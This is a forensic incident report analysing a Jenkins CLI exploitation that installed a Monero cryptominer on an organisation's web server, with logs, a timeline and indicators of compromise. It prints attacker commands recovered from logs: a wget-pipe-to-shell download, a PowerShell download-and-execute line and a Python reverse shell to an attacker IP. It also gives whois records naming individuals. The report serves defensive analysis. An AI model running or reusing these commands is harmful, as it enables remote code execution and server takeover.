----- # Executive Summary This report describes the discovery and analysis of a security breach in a web server of one of our partner organizations on February 2018. The analysis revealed a long pattern of attacks against several web servers in the same organization which intended to use the compromised server for cryptomining purposes. The attackers exploited a known vulnerability in Jenkins and Apache web server. After exploitation, the attackers attempted to download and execute a Monero cryptocurrency mining malware in the compromised system. These attacks aimed to take advantage of the computational power available on the organization for mining cryptocurrency. The attacks did not specifically target the organization. The attacks were first found around mid 2017 and there are several descriptions of their activities. However, there has not been so far a ​complete description of the methodologies, tools, infrastructure and possible scope of the threat. Our team inspected historical application logs, network traffic from hundred of servers and the actual malicious files to better understand the attack. We uncovered several unknown details of the attacks that are useful to better understand the threat. The attacks in the organization’s servers date back to mid 2017 and the attackers repeated them every few months. Although the cryptocurrency mining malware is not new to the security community, a ​change **has been witnessed in the techniques and exploits used to gain control of servers. The** same malware adapts to use different and new exploits, can infect different operating systems, and has a large capability to find vulnerable servers. We concluded that the ​threat is **significant, and it has a large and complex background infrastructure. Moreover, the​** cryptocurrency wallet used in this attack was previously used in other attacks, suggesting that the attackers were from the same group. The wallet is well known to the community, blocking it to receive and send payouts in several cryptocurrency sites. An analysis of this wallet is performed. We conclude that cryptomining attacks are a real and large threat to the Internet, obtaining hundreds of thousands of dollars per wallet and putting at risk the operation of millions of servers. These attacks seem to be part of a large infrastructure of malicious activities and not isolated cases. The time, money, servers and amount of code needed to maintain the operation is large enough to justify a deeper analysis. ----- # Contents **Executive Summary** **2** **Contents** **3** **Discovery and Vulnerability** **4** Incident discovery 4 Details of the exploited vulnerability 5 **Forensic Analysis** **5** Apache logs 6 Tomcat logs 6 Analysis of the malicious shell script 8 Bash script logo4.jpg 8 **Infrastructure of the Attack** **12** **Timeline of the Attack on Nora** **14** **Indicators of Compromise** **15** Attackers Source IPs 15 Shell Scripts 17 Crypto miners and Configuration Files 17 **Response from the Community and Countermeasures** **19** **Related Attacks and Educational Environments** **19** **Conclusions** **23** **References** **24** **Appendix A: Information on malware sample 4fa4269b7ce44bfce5ef574e6a37c38f** **26** Malware identification 26 Malware reports 26 **Appendix B: YARA rules for miner detections** **28** ----- # Discovery and Vulnerability ## Incident discovery On ​February 19th, 2018, around 12:00 CET, the CivilSphere team received an alert from the​ system administrator of one of our partner organizations. A web server, named Nora, was​ displaying unusual behavior that suggest an ongoing intrusion attack. The alert was triggered after receiving an automated email from the ​c​ron daemon indicating that there was a task trying to stop certain processes but didn’t have the permissions to do so. The email looked like this: **From: root ** **To: "tomcat6"** **Cc:** **Bcc:** **Date: Mon, 19 Feb 2018 12:21:02 +0100** **Subject: Cron wget -q http://192.99.142.232:8220/logo4.jpg -O - | sh** **pkill: killing pid 2271 failed: Operation not permitted** **pkill: killing pid 1774 failed: Operation not permitted** **pkill: killing pid 2271 failed: Operation not permitted** The email alert had enough information to start investigating. The subject alone was a strong indication that something suspicious was occurring. There was an unauthorized task in the _crontab that was attempting to download a file called “logo4.jpg​_ ” from the IP​ ​192.99.142.232, and then trying to execute it. Our team downloaded this file in a safe environment to examine it. The file was a shell script that executed several instructions. These included commands to: - Kill a fixed list of processes. Possibly to delete previous versions of itself or other competing processes. - Add itself to the crontab​ in order to have persistence in the server. ​ - Download two files, a binary file and a JSON file. The script is designed to attempt different downloads in case the first download fails (see SubSection ‘Analysis of the malicious shell script’ for the full functionality of this script). In this case, the first download attempt failed, but the second one was successful: ----- a. First it tried to download a first pair of files: ​gcc and ​config_1.json. Files were​ stored in /var/tmp/ folder as ​supsplk and ​config.json respectively.This attempt failed. b. Since the first attempt failed, the script tried to download a second pair of files: **_minerd ​and ​c1.json ​files. Files were stored in /var/tmp/ folder as ​supsplk and_** **_config.json respectively. This attempt was successful. ​_** - Execute the binary file using the JSON file as a configuration file. - Start mining cryptocurrency. The analysis of the script and the downloaded files confirmed that we were dealing with a cryptomining attack. Inside the server, the team discovered the binary file called ​supsplk ​(ELF 64-bit LSB executable). According to VirusTotal, this file is likely malicious and categorized as a​ Linux ELF64 EXEC [8]. In order to get more information, the team also downloaded the **_config.json file used by ​supsplk. This file had credentials for the monero cryptocurrency wallet​_** using the monerohash.com server. ## Details of the exploited vulnerability According to our findings, the attacker exploited the **Jenkins​** **CLI** vulnerability (CVE-2017-1000353)​ in the attacked server, which provides unauthenticated remote code execution. The vulnerability is described by the MITRE CVE dictionary as follows: “Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an unauthenticated​ _remote code execution. An unauthenticated remote code execution vulnerability allowed attackers to_ _transfer a serialized Java `SignedObject` object to the Jenkins CLI, that would be deserialized using a new_ _`ObjectInputStream`, bypassing the existing blacklist-based protection mechanism. We're fixing this issue_ _by adding `SignedObject` to the blacklist. We're also backporting the new HTTP CLI protocol from_ _Jenkins 2.54 to LTS 2.46.2, and deprecating the remoting-based (i.e. Java serialization) CLI protocol,_ _disabling it by default.​” [5]_ In this case, the compromised server was running Jenkins 1.532.2, a very old version of the software. The vulnerability was announced by the Jenkins team on May 26th, 2017. In newer versions of Jenkins, the remote-based CLI was deprecated, introducing a new one based in HTTP, in addition to an existing one that uses SSH. The Jenkins team recommends to disable the use of the former and use any of the latter instead. # Forensic Analysis Fortunately, the CivilSphere team had access to the complete logs of the infected server as well as its historical network traffic. To better understand how the attacker got inside the server ----- and pinpoint its entry point, we started by checking the logs of services which were running with Apache/Tomcat and Jenkins users. ## Apache logs The following logs were extracted from the Apache web server at the moment of the attack. It can be seen that the Jenkins application was targeted, and that the attack came from the IP address 192.99.142.227​ . ​ **192.99.142.227 - [19/Feb/2018:12:04:01 +0100] "POST /jenkins/cli HTTP/1.1" 200 2670 "-"** **192.99.142.227 - [19/Feb/2018:12:04:02 +0100] "POST /jenkins/cli HTTP/1.1" 200 213 "-"** **192.99.142.227 - [19/Feb/2018:12:04:03 +0100] "POST /jenkins/cli HTTP/1.1" 200 2670 "-"** **192.99.142.227 - [19/Feb/2018:12:04:04 +0100] "POST /jenkins/cli HTTP/1.1" 200 213 "-"** **192.99.142.227 - [19/Feb/2018:12:04:05 +0100] "POST /jenkins/cli HTTP/1.1" 200 2670 "-"** **192.99.142.227 - [19/Feb/2018:12:04:06 +0100] "POST /jenkins/cli HTTP/1.1" 200 213 "-"** These logs were obtained from the attacked server and later on, this activity was verified with our external network capture. These logs gave us the first indication on how the attack worked. ## Tomcat logs Looking at the Tomcat logs of the infected server it was possible to see the exact sequence of attacks. The first successful command to download and execute a malicious script was found in the Tomcat logs on Feb 19, 2018 at 12:04:04​, as seen below: ​ **Feb 19, 2018 12:04:04 PM - hudson.remoting.SynchronousCommandTransport$ReaderThread run** **SEVERE: I/O error in channel HTTP full-duplex channel** **9763bad9-c57a-4b5d-9eeb-faca755efad0** **hudson.remoting.DiagnosedStreamCorruptionException** **...** **'mbash -c** **{echo,d2dldCAtcSBodHRwOi8vMTkyLjk5LjE0Mi4yMzI6ODIyMC9sb2dvNC5qcGcgLU8gLSB8IHNo}|{base64** **,-d}|{bash,-i}t'** **...** The string in that log is encoded in Base64: **d2dldCAtcSBodHRwOi8vMTkyLjk5LjE0Mi4yMzI6ODIyMC9sb2dvNC5qcGcgLU8gLSB8IHNo** Decoding the string shows the instruction to download and execute a malicious shell script: **wget -q http://192.99.142.232:8220/logo4.jpg -O - | sh** This was the successful attack that infected the Nora server. ----- There was a second command observed in the Tomcat logs that attempted to download and execute a malicious script, this time for Windows. The attempt was performed on ​Feb 19, 2018 **at 12:04:06, as it can be read below: ​** **Feb 19, 2018 12:04:06 PM - hudson.remoting.SynchronousCommandTransport$ReaderThread run** **SEVERE: I/O error in channel HTTP full-duplex channel** **dd599c96-9e2f-4f5d-a69a-f781b2476d1c** **hudson.remoting.DiagnosedStreamCorruptionException** **...** **'*powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc** **cABvAHcAZQByAHMAaABlAGwAbAAgAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGU** **AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAD** **EANQA4AC4ANgA5AC4AMQAzADMALgAxADcAOgA4ADIAMgAwAC8AMQAuAHAAcwAxACcAKQA=t'** **...** The string in that log is encoded in Base64: **cABvAHcAZQByAHMAaABlAGwAbAAgAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGU** **AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAD** **EANQA4AC4ANgA5AC4AMQAzADMALgAxADcAOgA4ADIAMgAwAC8AMQAuAHAAcwAxACcAKQA=** Decoding the string shows the instruction to download and execute a malicious shell script but for Windows: **Base64 decode: powershell IEX (New-Object** **Net.WebClient).DownloadString('http://158.69.133.17:8220/1.ps1')** Other attacks were found in the Tomcat logs, most of them from last year. These dates are consistent with the announcement of the Jenkins vulnerability on May 2017. One of the first attempts was made on June 2017 and it was a request to ​http://218.161.13.248/1.txt (not accessible now). Another attempt worth considering was in September 2017, which sent a request to the Jenkins CLI with the following content: Sep 13, 2017 3:45:09 PM hudson.remoting.SynchronousCommandTransport$ReaderThread run SEVERE: I/O error in channel HTTP full-duplex channel 64e64e99-7e68-433a-8280-3994d261137c hudson.remoting.DiagnosedStreamCorruptionException ... /bin/basht' 0x00 0x02 '-ct' 0x00 0xe5 'python -c 'import ​ **_socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("91._** **_232.125.211",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);_** **_os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]) ​_** The bold and italic text is a classic method to obtain a ​reverse shell to bypass firewall protections. This command would make a connection from the server to the attacker instead of the attacker to the server, and it is usually a connection with the ability to run system ----- commands. In this case the attacker IP address was ​91.232.125.211. Some of these attacks​ were successful, but it is difficult to be completely certain after half a year. ## Analysis of the malicious shell script The attack on the server consisted of a bash script, used for checking running processes, new versions of the script, and download of miner executables for Linux. Below you will find a detailed analysis of the files involved in this attack. ## Bash script logo4.jpg [This bash script, with MD5 ​b413478091f9fa96ad88cbe57cde3d5b, was downloaded directly​](https://www.virustotal.com/#/file/b413478091f9fa96ad88cbe57cde3d5b) from the code executed by the exploit. The script is very generic and it takes care of downloading and updating itself using the ​cron service. ​At the moment of detection, this **malicious file was not uploaded to the VirusTotal service1 .** 1 https://www.virustotal.com/#/file/b413478091f9fa96ad88cbe57cde3d5b ​ ----- The file is a Linux/Unix shell script that contains 369 lines of code. A total of 298 lines of code are dedicated to kill existing processes using different methods: killing through specific process names, removing specific known malicious files from the system, and searching for keywords or PIDs. The first 20 lines of the script are shown below, and they show how the authors of the script attempted to kill not only previously existing versions of the same script, but also other possible cryptocurrency miners that have compromised the server previously. The script used pkill​ ​, which allows to kill processes by name. **#!/bin/sh** **pkill -9 142.4.124.164** **pkill -9 192.99.56.117** **pkill -f 67.231.243.10** **pkill -9 jva** **pkill -f ./atd** **pkill -f /tmp/wa/httpd.conf** **pkill -f 108.61.186.224** **pkill -f 128.199.86.57** **pkill -f 142.4.124.164** **pkill -f 192.99.56.117** **pkill -f 45.76.102.45** **pkill -f AnXqV.yam** **pkill -f BI5zj** **pkill -f Carbon** **pkill -f Duck.sh** **pkill -f Guard.sh** **pkill -f JnKihGjn** **pkill -f KGlJwfWDbCPnvwEJupeivI1FXsSptuyh** **pkill -f NXLAi** After the first batch of instructions to kill processes, the script creates a new job in the ​crontab to download a new version of the script periodically. The script removes existing ​cron jobs in the ​crontab first, then creates a new ​crontab instruction and stores it as a temporary file. The temporary file is used to write the new crontab​ ​ instruction and is deleted afterwards. The next section of the script attempts to pause two docker processes if they are running: **_kube-apis and ​nginx78​. The malware then downloads a new version of the configuration file_** and cryptomining malware, and runs it after calculating the number of cores in the server and number of pages that will be reserved. ----- _First if-then section: Download of gcc._ The remaining sections of the code can be split in “if - else” sections. In each section, the malicious script will check if the last command exited successfully or not. If it didn’t, the malware will proceed to download a new configuration and/or cryptominer version, it will calculate the number of cores and reserved pages, and the miner is run again. _Second if-then section: Download of minerd. This is the one that was successful in the attack of the Nora_ _server._ _Third if-then section: Download of atd2._ ----- _Fourth if-then section: Download of atd3._ _Fifth if-then section: Download of yam._ Notice that the downloaded resources are different. More details about these miners are included in the IoC​ section. The following is a summary of all the downloads in the if-then sections of the script: - First download: http://192.99.142[.]232:8220/gcc - Second download: http://192.99.142[.]232:8220/minerd **○** **This is the miner that was successfully executed in the server.** - Third download: http://192.99.142[.]232:8220/atd2 - Fourth download: http://192.99.142[.]232:8220/atd3 - Fifth download: http://192.99.142[.]232:8220/yam **The JSON configuration file** The malicious script also downloaded a configuration file. This configuration contains all the parameters that the crypto miner needs to run properly. This includes the algorithm, wallet address, password (never used), and other settings. An example of the configuration file can be seen below: ----- **{** **"algo": "cryptonight",** **"av": 0,** **"colors": true,** **"cpu-affinity": null,** **"cpu-priority": null,** **"donate-level": 0,** **"log-file": null,** **"max-cpu-usage": 90,** **"print-time": 60,** **"safe": false,** **"url": "stratum+tcp://monerohash.com:5555",** **"user":** **"41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKX** **pm3zKTUYo",** **"pass": "x",** **"keepalive": true,** **"nicehash": false** **}** In this configuration file it can be seen that the miner uses the pool service ​monerohash.com with the wallet: **41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xg** **Ui29TpKXpm3zKTUYo** This monero wallet has already been known in the security community since last year, participating in a number of attacks and infections. See Section “Related Attacks and​ Educational Environments“​ for more information about related attacks using this wallet. The configuration script also shows that the password used was ‘x’, however the mining service does not use a password, so this information was not used. # Infrastructure of the Attack All the types of attacks reported on the Internet involving malware miners in the last year seem to have a very similar infrastructure that is driven by economic goals. They usually have three to four stages and at the end they execute a cryptocurrency miner. The mining software used for the attacks doesn’t have to be new or even considered malicious. The malware used in the intrusion (MD5 4fa4269b7ce44bfce5ef574e6a37c38f​ ) was found and reported as malicious by​ the community since 2016. The fact that the miner is well known since 2016 does not stop future attacks easily since the script is quite easy to modify and adapt, and also because it is only in the second stage. At the start of the intrusion, different vulnerabilities are exploited to gain access to the attacked system. ----- The complete schema of the infrastructure of the attack can be seen in Figure 1. The infrastructure is significant from the point of view that the IP address used for attacking our server and the IP address used for C&C belong to the same range ​192.99.142.0/24. In​ particular that IP range belongs to ​OVH Hosting, Inc. Since there are no known services or organizations registered as owners of these IP addresses for legal purposes, we may conclude that the IPs were probably rented as hosting services for the purpose of attacking. Figure 1. Schema of the infrastructure of the attack that resulted in the installation of the Linux Bitcoin Miner 4fa4269b7ce44bfce5ef574e6a37c38f. ----- # Timeline of the Attack on Nora The intrusion analyzed in this report was discovered in February 2018, however, there were identical attacks happening months before in the ​same server. In this section we present a​ general timeline of events to better understand the attack and how it took place. **2017 Nov -> 2018 Feb - Jenkins Version installed in the server: 1.532.2 ​** **2017 Nov -> 2018 Feb - Apache Tomcat Version installed in the server 6.0.35 ​** **2017 Nov 06 - [from apache logs] Several attempts to POST /jenkins/cli (200 OK) ​** **2017 Nov 06 - [from tomcat logs] Two attempts to download and execute a malicious shell ​** **script (C&C IP address 142.4.124.50, port 8220, files logo4.jpg, logo3.jpg)** **2018 Jan 11 -> Feb 12 - [netflows] Repetitive connections from Nora to the malicious IP ​** **142.4.124.50, port 8220. The amount of connections attempts indicate that it may have** **been a malfunction on a previous version of the malware installed on the server. Dozens** **of requests per minute.** **2018 Feb 01 - [netflows] Received attacks attempts to several hosts in the University ​** **from the same attacker that attacked Nora. Attempts do not work.** **2018 Feb 12 - [tomcat logs] Attempt to download and execute a malicious shell script ​** **(ip 142.4.124.50, port 8220, files logo4.jpg).** **2018 Feb 19 12:04 - [apache logs] Successful access to Jenkins cli via POST requests ​** **from 192.99.142.227 ("POST /jenkins/cli HTTP/1.1" 200 OK).** **2018 Feb 19 12:04 - [tomcat logs] Download and execution of a malicious shell script ​** **(ip 142.4.124.50, port 8220, file logo4.jpg).** **2018 Feb 19 12:04 - [tomcat logs] Download and execution attempt of a malicious shell ​** **for Windows (ip 158.69.133.17, port 8220 file 1.ps1)** **2018 Feb 19 12:05 - [tomcat logs] Tomcat logs stopped. ​** **2018 Feb 19 12:21 - [system admin] Email received by the administration that a task in ​** **the system was attempting to kill a process but wasn’t authorized to do so.** **2018 Feb 19 13:22 - [apache logs] Logs indicate that Jenkins was down.​** ----- # Indicators of Compromise Below are the indicators, along with their sha256 hashes when applicable, extracted from the attack starting from the exploit → shell script → crypto miner. Also included are the alternative crypto miner downloads, possible project sources, and wallet of the attacker. ## Attackers Source IPs **●** **192.99.142.227 (Attacker)** **NetRange: 192.99.0.0 - 192.99.255.255** **CIDR: 192.99.0.0/16** **NetName: OVH-ARIN-7** **NetHandle: NET-192-99-0-0-1** **Parent: NET192 (NET-192-0-0-0-0)** **NetType: Direct Allocation** **OriginAS: AS16276** **Organization: OVH Hosting, Inc. (HO-2)** **RegDate: 2013-06-17** **Updated: 2013-06-17** **Comment: www.ovh.com** **Ref: https://whois.arin.net/rest/net/NET-192-99-0-0-1** **CustName: Private Customer** **Address: Private Residence** **City: The Plains** **StateProv: OH** **PostalCode: 45780** **Country: US** **RegDate: 2017-12-12** **......** This seems to be a dynamic IP address which ISP is on Canada, but it was reselled to Ohio, US. - **142.4.124.50 (Attacker)** **NetRange: 142.4.124.0 - 142.4.124.255** **CIDR: 142.4.124.0/24** **NetName: 199-180-100-0-1** **NetHandle: NET-142-4-124-0-1** **Parent: PT-82-4 (NET-142-4-96-0-1)** **NetType: Reassigned** **OriginAS: AS54600** **Customer: Ryan koal (C03192641)** **RegDate: 2012-10-25** **Updated: 2012-10-25** **Ref: https://whois.arin.net/rest/net/NET-142-4-124-0-1** ----- **CustName: [[REDACTED]]** **Address: 1376 Craigview Dr.** **City: Chicago** **pittsburgh** **StateProv: PA** **PostalCode: 15243** **Country: US** **RegDate: 2012-10-25** **Updated: 2016-03-26** **●** **91.232.125.211 (Attacker)** **inetnum: 91.232.124.0 - 91.232.125.255** **netname: CYBERHOSTPRO** **descr: Cyber Host Pro LTD** **country: GB** **org: ORG-CHP2-RIPE** **admin-c: CD3587-RIPE** **tech-c: CD3587-RIPE** **status: ASSIGNED PI** **mnt-by: RIPE-NCC-END-MNT** **mnt-by: GLOBALAXS-MNT** **mnt-routes: GLOBALAXS-MNT** **mnt-domains: GLOBALAXS-MNT** **notify: samer@globalaxs.com** **created: 2011-11-09T13:31:35Z** **last-modified: 2016-06-09T14:47:28Z** **source: RIPE** **sponsoring-org: ORG-GL37-RIPE** **organisation: ORG-CHP2-RIPE** **org-name: Cyber Host Pro Ltd** **org-type: OTHER** **address: Unit 36 Evans Business Centre** **address: North Road** **address: Ellesmere Port** **address: Cheshire** **address: CH65 1AE** **address: United Kingdom** **e-mail: ipabuse@cyberhostpro.com** **abuse-c: AC30763-RIPE** **mnt-by: OHT-MAINT** **mnt-ref: OHT-MAINT** **created: 2009-02-21T17:53:39Z** **last-modified: 2016-02-15T17:03:24Z** **source: RIPE** **......** This server belongs to a VPS server in the UK. ----- ## Shell Scripts **●** **http://218.161.13[.]248/1.txt** - Used in June 2017 (inaccessible, likely same as the original shell script). - Associated with HINET-NET, Data Communication Business Group, Taiwan. **●** **http://142.4.124[.]50:8220/logo4.jpg** - Used in November 2017 (inaccessible, likely same as the original shell script). - Associated with an physical person in Pittsburgh, United States. **●** **http://158.69.133[.]17:8220/1.ps1** - Used on February 2018 (inaccessible, likely PowerShell version of the shell script). - a672a448cec76348d86c37c479a03dd0ba3ba142271d0aa3476298530204e295 - Associated with OVH Hosting, Inc., Canada. **●** **http://192.99.142[.]232:8220/logo4.jpg** - Used in the successful february 2018 attack (POSIX shell script). - 19c257223cc8dfee933d2ab8a647163683047e25e97f029a08d8fec7edb9a0b6 - Associated with OVH Hosting, Inc., Canada. ## Crypto miners and Configuration Files **●** **http://192.99.142[.]232:8220/gcc** - ELF 64-bit LSB executable, xmrig based miner. - 8bf1def5479b39376b3790a83380831d288c57dd4fbad8e64abc3a9062eb56bb - YARA: possible_cryptominer_xmrig - Miner based on [https://github.com/xmrig/xmrig​](https://github.com/xmrig/xmrig) ​ due to hits on yara rule based on the xmrig project. **●** **http://192.99.142[.]232:8220/c1.json** - Configuration file for the xmrig miner. - 8614f45af23b0b1d9b0d20296af4f2f6bd3a3a8f15b8e799f3e798bb8df850fa - Wallet - 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRX WbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo **●** **http://192.99.142[.]232:8220/minerd** - ELF 64-bit LSB executable, minerd based miner. - 63210b24f42c05b2c5f8fd62e98dba6de45c7d751a2e55700d22983772886017 - YARA: possible_cryptominer_minerd. ----- - Miner based on [https://github.com/pooler/cpuminer​](https://github.com/pooler/cpuminer) due to hits on yara rule ​ based on cpuminer project. **●** **http://192.99.142[.]232:8220/kworker** - Configuration file for bitcoin miner. - 036aef71da7f7ff02591669bb180eb41a7de8f6830ab74ebf2fc1d6db1424d21 - Wallet - 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRX WbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo **●** **http://192.99.142[.]232:8220/atd2** - ELF 64-bit LSB executable, bitcoin miner likely based on cpuminer. - 4811eab5b727d93309d8db651598d9e22bb7f87d385693efdda3576b9b2a56ad - Possibly based on [https://github.com/pooler/cpuminer​](https://github.com/pooler/cpuminer) (version 2.3.3) due to the ​ executable containing strings from the project, albeit inconclusively. **●** **http://192.99.142[.]232:8220/config_** - Inaccessible but likely another miner configuration file. - 31bae6f19b32b7bb7188dd4860040979cf6cee352d1135892d654a4df0df01c1 - Wallet - 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRX WbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo **●** **http://192.99.142[.]232:8220/yam** - ELF 64-bit LSB executable, likely based on cpuminer. - 5bb66a5e9a7f6c76325a55b7a4a3128fc8631805676bbd3315ce2ac04ac2937b - YARA: possible_cryptominer_minerd. - Miner based on [https://github.com/pooler/cpuminer​](https://github.com/pooler/cpuminer) due to hits on yara rule ​ based on cpuminer project. **●** **http://192.99.142[.]232:8220/atd3** - ELF 64-bit LSB executable, likely based on cpuminer. - F4864b3793c93de50b953e9751dc22e03fa0333ae6856d8d153be9018da6d911 - [Possibly based from https://github.com/pooler/cpuminer​](https://github.com/pooler/cpuminer) ​ (version 2.3.3) due to the executable containing strings from the project, albeit inconclusively. ----- # Response from the Community and Countermeasures The exact wallet used in this attack was reported for the first time in a Reddit channel [6] in January 3rd, 2018 by the Reddit user ​fearsparks. An admin member of the monero pool where​ the wallet was reported (Reddit nickname M5M400), blocked the wallet address so it could not receive payouts. Figure 2 shows the message of the administrator. Some minutes after the first block the Reddit user ​xnbya reported that the wallet was also blocked in the servers of minexmr.com. ​Our attack was detected on February 19th, which may means one of two things: that the attackers ​did not checked if the address was working in order to modify the malware and use a new address, or that they did changed the wallet in a new variant of the malware but the old version was automatically being delivered more than one month later. Figure 2. Message on Reddit from an administrator of the Monero pool saying that the wallet used in the attack has been blocked. This happened more than one month before the attack investigated in this report. The analysis, on January 3rd 2018, by Reddit user mg61456, was that the attacker was generating 174.51 KH per second, which is roughly $450 a day or $170k a year [6]. ​ The attacker was likely targeting random servers that were affected by the Jenkins vulnerability. The main goal for these type of attacks is to minimize the effort for the attacker and maximize the amount of compromised servers. A simple and effective ​countermeasure is to keep the ​software updated. In most cases, attackers won’t do extra work if servers are running up-to-date software. In this case the partner organization was running a web server with a Jenkins version from 2014. # Related Attacks and Educational Environments In February 2015, CheckPoint researchers warned about the active exploitation of the Jenkins vulnerability, CVE-2017-1000353, in what they claimed “One of the Biggest Mining Operations Ever Discovered” [1]. In the report, researchers indicate that the cryptocurrency wallet used by the attackers had already collected more than 3 million dollars [1]. ----- A Shell script with similar characteristics as the one mentioned in the section ‘Analysis of the malicious shell script’ was mentioned in a report in December 2017 [3]. The Shell script is different from the one we analyzed, but shows how at this stage, cryptomining attacks were already on the rise. In a security advisory by REN-ISAC [4], a series of attacks against Universities and Research Institutions were reported. The attacks, which attempted to exploit vulnerabilities on Oracle WebLogic, have the final goal of running cryptomining malware. The TTPs described on the report match what we have observed. The Nora server was also part of an educational environment. In this context we found that the educational environment had 3 other attacked computers in the same 2 days when we analyzed the compromise of the Nora Server. It is easy to understand why these type of organizations may be easily compromised and for longer periods of time. In the case of the Nora server, it was running four years old software. Similar attacks exploiting the same Oracle WebLogic vulnerability were reported, this time to different types of organizations [6]. One of the Wallets described in the discussion is the same as the one mentioned in this report. In February 2018, Trend Micro researchers reported active attacks against Apache CouchDB [2] exploiting two vulnerabilities, CVE-2017-12635 and CVE-2017-12636, which allow remote command execution and privilege escalation. After successful exploitation, the attackers would download a Shell Script used to launch cryptomining processes on the target. We traced back the attacker’s activity by looking at other intrusions that used the same Wallet and discovered a long list which started mid 2017. The timeline of attacks that used the same wallet is listed below: 2 - **Jun. 02, 2017: Exploited server running DC/OS Marathon software [9]. ​** This is supposedly the first attack description using the monero wallet. - **Jul. 18, 2017: Crypto miner attack abusing Redis in CentOS host [10]. ​** - **Aug. 04, 2017: Attacking a redis server [13]. ​** - **Oct. 11, 2017: Cryptomining attack abusing Kubernetes [15]. ​** - **Nov. 20, 2017: Joe Sandbox file analysis of a malicious script starting a ​** cryptomining process with the same wallet [11]. - **Nov. 30, 2017: The malicious script shared on PasteBin [22]. ​** - **Dec. 14, 2017: Cryptomining attack in Windows via Powershell [21]. ​** - **Dec. 25, 2017: Reverse.it file analysis of a malicious script starting a ​** cryptomining process with the same wallet [12]. - **Jan. 03, 2018: The malicious script shared on PasteBin [23]. ​** 2 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo ​ ----- - **Jan. 12, 2018: The malicious script shared on PasteBin [24]. ​** - **Jan. 13, 2018: The malicious script for Windows shared on PasteBin [22]. ​** - **Jan. 23, 2018: Cryptomining attack in Windows via Powershell [20]. ​** - **Feb. 06, 2018: The malicious script shared on PasteBin [25]. ​** - **Mar. 16, 2018: Cryptomining attack in Windows via Powershell [16]. ​** - **Apr. 06, 2018: CouchDB 2.1.0 attacked for cryptomining activities [17]. ​** - **Apr. 18, 2018: Drupal Servers exploited for cryptomining activities [18]. ​** Attackers exploit vulnerability CVE-2018-7600 on Drupal servers. - **Apr. 19, 2018: Ubuntu Server 16.04 compromised by crypto miner [19]. ​** - **Apr. 29, 2018: A new version of the malicious script is shared on PasteBin ​** [14]. The information retrieved from all these reports in the last year indicate that the threat actors were prepared for exploiting different software vulnerabilities and multiple operating systems. Apart from the previous detected attacks using the same Monero wallet, we found other malware related with the use of ​this same wallet in VirusTotal. The following cryptomining malware versions all use the same Wallet: **Virus** **First** **SHA256** **Total** **Submission** **Size** **Type** **Comment** **Score** **Date** f1e5fc21e0ea575783dc6b555083584c4e3b 801 Powershell script Oldest script 11/59 2017-11-17 647697ec6973fb7076f55a2c5118 bytes for Windows for Windows 1ef429dd2e38a537b174adbee1dbf8aad33b Bash script for Oldest script 21/58 2017-11-20 2.3 KB 5dbd207192b015ebd6eff34a879c Linux for Linux |SHA256|Virus Total Score|First Submission Date|Size|Type|Comment| |---|---|---|---|---|---| |f1e5fc21e0ea575783dc6b555083584c4e3b 647697ec6973fb7076f55a2c5118|11/59|2017-11-17|801 bytes|Powershell script for Windows|Oldest script for Windows| |1ef429dd2e38a537b174adbee1dbf8aad33b 5dbd207192b015ebd6eff34a879c|21/58|2017-11-20|2.3 KB|Bash script for Linux|Oldest script for Linux| |fd4a5a696bee8c5ab0ea68f071fd3938b531 52c3e6fe6bacbe395a0b8df6d254|20/59|2017-12-26|4.1 KB|Bash script for Linux|| |7394149d657d90d57cf1f80c0c1aef6c7cbb 3cad5f63e1f1ce0cb9aa68c13887|5/59|2017-12-26|4.1 KB|Bash script for Linux|| |54088e34c1fab1f837be90c8125faf36a275 e9b9db83d1da79cf776b1b35bcfb|5/60|2018-01-08|4.3 KB|Bash script for Linux|| |dd93f36dd1b18ca4a2ad46a17fd9ac5991f7 20c0627fabe07a87e4e3b8cd7ea9|23/59|2018-01-30|8.0 KB|Bash script for Linux|| |fa5777aac8a628589289ce52ea18ae08b33a 6f057811281dc442c812b8fc21b7|12/54|2018-02-08|8.0 KB|Bash script for Linux|| |5d61c7cecee81eb73e77f60d63cf2f03382d eaa5fd8392b983c8a96ff912d264|20/58|2018-02-13|8.0 KB|Bash script for Linux|| |fa1c458b4b7458b79dfa5fa8ffdd297e35a8 c27570c388ca271305ca1e6769f7|12/58|2018-02-20|4.1 KB|Bash script for Linux|| |19c257223cc8dfee933d2ab8a64716368304 7e25e97f029a08d8fec7edb9a0b6|7/59|2018-02-20|8.0 KB|Bash script for Linux|Script used in this attack| |1e43eac49ff521912db16f7a1c6b16500f78 18de9f93bb465724add5b4724a13|27/59|2018-03-04|8.0 KB|Bash script for Linux|| |9b555a9f32b1a5db5b23756552531187ee39 3e057eb7ffd57ebc8d05601b7609|21/56|2018-03-04|2.1 KB|Powershell script for Windows|| ----- ec2ab9a279d73f8ee26cf47bced5a00dd540 Bash script for Attacks 0/59 2018-05-15 1.5 KB e75469d098a0f5f0a44d69a4a935 Linux against docker 